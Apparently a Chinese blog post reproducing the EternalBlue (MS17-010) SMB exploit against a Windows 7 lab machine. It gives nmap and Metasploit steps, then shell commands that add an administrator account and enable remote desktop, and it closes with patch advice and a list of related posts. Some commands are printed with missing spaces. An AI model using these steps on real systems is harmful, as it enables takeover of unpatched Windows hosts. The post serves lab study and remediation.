linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010)
漏洞描述:
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
影响版本:
目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
复现环境:
攻击机:Linux kali4.18.0-kali1-amd64 (IP:192.168.23.130)
靶机:Windows 7 X64 (IP:192.168.23.133)
复现过程:
1.主机发现
登录kali linux,用nmap探测本网段存活主机 nmap -r 192.168.23.0/24
探测到存活主机ip,并探测到开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。
2.进入MSF框架
执行msfconsole命令
搜索ms17-010代码 msf > search ms17_010
这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
3.使用ms17-010扫描模块,对靶机Win7进行扫描
使用模块
msf> use auxiliary/scanner/smb/smb_ms17_010
设置目标ip或网段
msfauxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.23.133
执行扫描
msfauxiliary(scanner/smb/smb_ms17_010) > run
4.使用ms17-010攻击模块,对靶机Win7进行攻击
使用模块
msf> use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标ip
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST192.168.23.133
查看设置选项
msfexploit(windows/smb/ms17_010_eternalblue) > show options
执行攻击
msfexploit(windows/smb/ms17_010_eternalblue) > exploit
直接拿到Win7的Shell,之后便可以通过Shell对目标靶机进行控制。
5.通过shell对靶机Win7进行控制
创建新用户Dragon
netuser Dragon 123456 /add
将用户Dragon添加至管理员组
netlocalgroup administrators Dragon /add
开启远程桌面功能
REGADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /vfDenyTSConnections /t REG_DWORD /d 0 /f
kali 远程桌面连接Win7
rdesktop192.168.23.133:3389
可以看到,最终Kali通过shell新建了用户,并通过远程桌面连接到目标靶机上。上面这是一个简单的演示,告诉大家这个漏洞很危险,真正的攻击能做的事情更多,所以还是要多打补丁或安装安全软件。
漏洞修复
①在线更新;开启Windows Update更新。
②打补丁;此漏洞对应的微软补丁地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010
linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)相关推荐
- 利用虚拟机复现漏洞 “永恒之蓝”
利用虚拟机复现漏洞"永恒之蓝" 攻击:kali Linux 2020.3 靶机:Windows Server 2008 R2 x64 下面详细讲述测试的过程. -- -- &quo ...
- 服务器漏洞--永恒之蓝
漏洞问题的简单分析 前言:不扫不知道,一扫吓一跳,原来服务器存在这么多安全隐患:看到这些,可谓祖国江山一片红,下面是解决思路和方式 图中可以发现三类漏洞,服务漏洞,数据库漏洞,服务器本身漏洞. 1.服 ...
- 网络安全-MS17-010漏洞-永恒之蓝
网络安全-MS17-010漏洞-永恒之蓝 这个东西怎么说呢,无论是干网络的没干网络的,估计每个人都听说过这个叫做永恒之蓝的东西 这个东东当时可谓是红极一时,现在也有点热度 这个漏洞呢,在win10是不 ...
- Win7经典漏洞永恒之蓝复现
Win7经典漏洞永恒之蓝复现 环境 信息收集 确定漏洞 渗透 渗透成功后一些常用操作 环境 工具:metaspoilt 模拟攻击机ip:192.168.2.19 靶机ip:192.168.2.22 信 ...
- MS17-010 漏洞永恒之蓝445漏洞复现
前言 这里使用kali中的Metasploit 主要利用445端口的漏洞 首先需要一台win7作为目标靶机 (不只是win7可以) 启用Metasploit mfsconsole 1.查找漏洞模块 s ...
- 红蓝对抗-2022年蓝队初级护网测试总结
2022年蓝队初级护网测试总结 文章目录 2022年蓝队初级护网测试总结 一. 设备误报如何处理? 二. 如何区分扫描流量和手工流量? 三. 网站被上传webshell如何处理? 四. 给你一个比较大 ...
- 新代码漏洞“永恒之黑”该如何警惕?
> 欢迎关注公众号"中科天齐"(id:woocoom),获取更多行业专业资讯! 新代码漏洞"永恒之黑"该如何警惕? 北京时间3月12日,针对最新披露的SM ...
- 《英雄联盟》出现大面积闪退;两名 95 后大学生用脑电波写“福”字;Windows蓝屏为什么是蓝底白字? | 极客头条...
「极客头条」-- 技术人员的新闻圈! CSDN 的读者朋友们早上好哇,「极客头条」来啦,快来看今天都有哪些值得我们技术人关注的重要新闻吧. 整理 | 丁恩华 出品 | CSDN(ID:CSDNnews ...
- Linux glibc 库的修复方案扯出更严重的新漏洞
聚焦源代码安全,网罗国内外最新资讯! 作者:Steven J. Vaughan-Nichols 编译:代码卫士 GNC C Library (glibc) 库对 Linux 至关重要.因此当它出问题 ...
- W ndows7蓝屏0x00000024,Win7蓝屏代码0x00000024修复方法
[导读]Win7蓝屏代码0x00000024相关问题,下面191路由网小编为大家详细解答. 电脑蓝屏,又叫蓝屏死机(Blue Screen of Death,简称BSOD),是微软的 Windows ...
最新文章
- “小霸王学习机”再现?树莓派400正式发布,售价70美元
- nboot通过DNW下载并运行eboot.nb0
- import export php,import与export在node.js中的使用方法
- oracle安装中桌面模式与服务器模式的去别
- LeetCode 616. 给字符串添加加粗标签(Trie树)
- (pytorch-深度学习)SE-ResNet的pytorch实现
- 02-方法-课后思考
- mysql别人的框架_MySQL逻辑架构
- Ubuntu 汉字显示一半的修复
- 如果你现在很穷,很苦,不要苦恼
- java 反编译修改软件名字_反编译APK更改文件的文字(修改应用名称)
- dns、网关、IP地址,主要是配置resolv.conf\network\ifcfg-eth0
- click事件的执行顺序
- Linux终端的总结和shell
- Knockout自定义绑定my97datepicker
- 不谋一时不足以谋一域_请问不谋万世者不足谋一时,不谋全局者,不足谋一域,接下来是什么?这段话太精辟了,能不能把全文发送过来?...
- 实现类CAD的交互式命令系统
- 春晚宫女唐奕霖被爆背景深厚 可携助手出入央视排练场享有特权
- 【Java基础】Java综合练习
- Python强化知识之获取网络资源 Urllib(一)
热门文章
- Tricks(二十九)—— 2^10000 的位数
- 为什么黑客都用python-python为什么会作为黑客的首选语言?这几本书给你答案(已集齐)...
- python自动化测试-python自动化之(自动化测试报告)
- python常用代码大全-Python 网络爬虫实战项目代码大全
- python画条形图-用Matplotlib如何绘制条形图、直方图和散点图
- python入门教程pdf-《python基础教程(第3版)》高清版PDF免费下载
- python基础教程免费下载-《Python机器学习基础教程》高清版免费PDF下载
- 学python买什么书-Python爬虫入门看什么书好 小编教你学Python
- python有哪些用途-python的主要用途是什么
- pagerank数据集_机器学习十大经典算法-PageRank(附实践代码)